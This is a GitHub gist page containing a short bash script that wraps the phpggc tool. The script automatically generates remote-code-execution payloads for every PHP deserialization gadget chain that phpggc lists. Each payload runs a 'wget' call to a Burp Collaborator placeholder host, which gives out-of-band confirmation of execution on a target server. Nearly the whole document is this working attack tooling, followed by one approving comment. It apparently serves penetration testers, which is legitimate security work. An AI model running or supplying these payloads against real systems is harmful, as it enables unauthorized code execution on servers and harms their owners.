Last active
February 5, 2023 21:52
-
-
Save honoki/029425e61e829a9344558c8587c29f0f to your computer and use it in GitHub Desktop.
Automatically generate properly formatted RCE payloads for every gadget chain in phpggc.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| # phpggc wrapper that automatically generates payloads for RCE gadgets | |
| function="system" | |
| command="wget http://your.burpcollaborator.net/?" | |
| # modify the options below depending on your use case | |
| options="-a -b -u -f" | |
| # generate gadget chains | |
| ./phpggc -l | grep RCE | cut -d' ' -f1 | xargs -L 1 ./phpggc -i | grep 'phpggc ' --line-buffered | | |
| while read line; do | |
| gadget=$(echo $line | cut -d' ' -f2) && | |
| if echo $line | grep -q "<function> <parameter>"; then | |
| ./phpggc $options $gadget "$function" "$command?$(date +%s)" | |
| elif echo $line | grep -q "<code>"; then | |
| ./phpggc $options $gadget "$function('$command?$(date +%s)');" | |
| elif echo $line | grep -q "<command>"; then | |
| ./phpggc $options $gadget "$command?$(date +%s)" | |
| else | |
| ./phpggc $options $gadget | |
| fi; | |
| done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
nice work, saves a lot of time!